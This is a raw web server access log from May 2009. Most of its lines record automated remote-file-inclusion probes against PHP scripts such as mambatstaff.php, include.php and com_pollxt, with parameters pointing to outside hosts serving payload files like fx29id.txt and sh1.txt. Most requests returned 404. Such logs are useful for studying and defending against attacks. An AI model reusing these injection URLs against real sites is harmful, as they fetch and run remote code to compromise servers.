72.18.148.82 - - [29/May/2009:00:51:21 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:00:52:24 -0400] "GET /logs/access_log.Q109050700%20%20//newspublish/include.php?path%5Bdocroot%5D=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:00:52:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.221.10.116 - - [29/May/2009:00:54:21 -0400] "GET /logs/error_log.Q109011200%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:54:21 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:55:27 -0400] "GET /logs/error_log.Q109011200%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:55:27 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:55:31 -0400] "GET /logs/error_log.Q109011200%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:55:31 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:56:54 -0400] "GET /logs/error_log.Q109010200%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:00:57:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.221.10.116 - - [29/May/2009:00:57:49 -0400] "GET /logs/error_log.Q108102500%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:18 -0400] "GET /logs//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:18 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:18 -0400] "GET //include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:19 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:25 -0400] "GET //include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:25 -0400] "GET /logs/access_log.Q109021500//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:25 -0400] "GET /logs//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:00:58:26 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:58:39 -0400] "GET /logs/error_log.Q109010200%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:58:40 -0400] "GET /logs/error_log.Q109010200%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:00:59:35 -0400] "GET /logs/error_log.Q108100300//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:59:41 -0400] "GET /logs/error_log.Q108102500%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:00:59:41 -0400] "GET /logs/error_log.Q108102500%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:01:00:22 -0400] "GET //playing.php?commonpath=http://chr.es.kr/02.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:01:01:51 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:01:51 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:01:51 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:01:02:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [29/May/2009:01:02:42 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:02:44 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:02:48 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:02:50 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:02:58 -0400] "GET /logs/error_log.Q108100300//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.181.7.97 - - [29/May/2009:01:03:54 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.18.148.82 - - [29/May/2009:01:04:40 -0400] "GET /logs/main.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:04:40 -0400] "GET /main.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:01:05:52 -0400] "GET /logs/access_log.Q109051800//playing.php?commonpath=http://chr.es.kr/02.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:01:05:52 -0400] "GET //playing.php?commonpath=http://chr.es.kr/02.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:01:05:53 -0400] "GET /logs//playing.php?commonpath=http://chr.es.kr/02.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
72.18.148.82 - - [29/May/2009:01:07:11 -0400] "GET /modules/My_eGallery/index.php?basepath=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:07:11 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:07:11 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:01:07:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [29/May/2009:01:07:34 -0400] "GET /logs/error_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
211.43.202.66 - - [29/May/2009:01:07:34 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.43.202.66 - - [29/May/2009:01:07:34 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:01:07:46 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.43.202.66 - - [29/May/2009:01:08:04 -0400] "GET /logs/access_log.Q109050700/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
69.94.125.100 - - [29/May/2009:01:08:19 -0400] "GET /logs/access_log.Q109051600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:01:08:19 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:01:08:19 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:08:33 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:08:33 -0400] "GET /logs/access_log.Q109051800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:08:33 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.43.202.66 - - [29/May/2009:01:08:34 -0400] "GET /logs/access_log.Q109051800%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
207.213.245.215 - - [29/May/2009:01:08:44 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:08:44 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:08:44 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:08:45 -0400] "GET /logs/access_log.Q109050700%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:08:46 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:09:19 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:09:22 -0400] "GET //login.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:09:22 -0400] "GET /logs//login.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:09:22 -0400] "GET /logs/access_log.Q109051100%20%20//login.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:09:54 -0400] "GET /logs/access_log.Q109051800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.213.245.215 - - [29/May/2009:01:09:55 -0400] "GET /logs/access_log.Q109050700/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:01:10:11 -0400] "GET /logs/error_log.Q109050800//playing.php?commonpath=http://chr.es.kr/02.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:01:11:56 -0400] "GET /logs/access_log.Q109050700%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:12:06 -0400] "GET /logs/error_log.Q109051800//include/write.php?dir=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.43.202.66 - - [29/May/2009:01:12:21 -0400] "GET /logs/error_log.Q108113000/port.php?content=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.43.202.66 - - [29/May/2009:01:12:21 -0400] "GET /logs/port.php?content=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
211.43.202.66 - - [29/May/2009:01:12:21 -0400] "GET /port.php?content=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
209.59.12.99 - - [29/May/2009:01:12:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.27.146.45 - - [29/May/2009:01:12:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
211.43.202.66 - - [29/May/2009:01:12:35 -0400] "GET /logs/error_log.Q108061500/port.php?content=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
58.27.146.45 - - [29/May/2009:01:12:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
58.27.146.45 - - [29/May/2009:01:12:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
58.27.146.45 - - [29/May/2009:01:12:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
211.43.202.66 - - [29/May/2009:01:13:26 -0400] "GET /logs/error_log.Q108113000%20/port.php?content=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
211.43.202.66 - - [29/May/2009:01:13:27 -0400] "GET /logs/error_log.Q108061100%20/port.php?content=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
72.18.148.82 - - [29/May/2009:01:14:00 -0400] "GET //components/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:14:00 -0400] "GET /logs//components/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:14:04 -0400] "GET /logs/access_log.Q109050700%20%20//components/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:14:08 -0400] "GET /logs/access_log.Q109052200%20%20//components/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
97.87.24.153 - - [29/May/2009:01:16:23 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.1" 200 71817 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
97.87.24.153 - - [29/May/2009:01:16:38 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
207.213.245.215 - - [29/May/2009:01:16:54 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:17:06 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:17:06 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
209.59.12.99 - - [29/May/2009:01:17:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.51 - - [29/May/2009:01:17:36 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.49 - - [29/May/2009:01:20:05 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
97.87.24.153 - - [29/May/2009:01:20:26 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
97.87.24.153 - - [29/May/2009:01:20:31 -0400] "GET /images/items/88330009_THUMB.JPG HTTP/1.1" 200 1723 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
203.151.233.72 - - [29/May/2009:01:21:11 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:11 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:11 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:15 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:19 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:26 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:44 -0400] "GET /main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:21:59 -0400] "GET /logs/main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:22:11 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:01:22:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [29/May/2009:01:22:47 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.111.94.201 - - [29/May/2009:01:22:49 -0400] "GET /logs/access_log.Q109051800/[Script%20Path]/admin/index.php?o=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.111.94.201 - - [29/May/2009:01:22:49 -0400] "GET /logs/[Script%20Path]/admin/index.php?o=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
208.111.94.201 - - [29/May/2009:01:22:52 -0400] "GET /[Script%20Path]/admin/index.php?o=http://www.arrimage-im.qc.ca//file/data/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:01:24:50 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:25:54 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:25:54 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:25:54 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:26:01 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:26:01 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:26:01 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:26:04 -0400] "GET /logs/access_log.Q109051000%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:26:04 -0400] "GET /home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:26:04 -0400] "GET /logs/home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:26:04 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:26:04 -0400] "GET /index.php?pag=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:26:04 -0400] "GET /logs/index.php?pag=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:01:26:10 -0400] "GET /logs/access_log.Q109051000%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:26:14 -0400] "GET /logs/error_log.Q108100300//admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:14 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:14 -0400] "GET /logs/error_log.Q108100300//admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:14 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:14 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:15 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:26 -0400] "GET /logs/error_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:26:28 -0400] "GET /logs/error_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
216.221.10.116 - - [29/May/2009:01:26:29 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:01:26:29 -0400] "GET /logs/access_log.Q109050300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
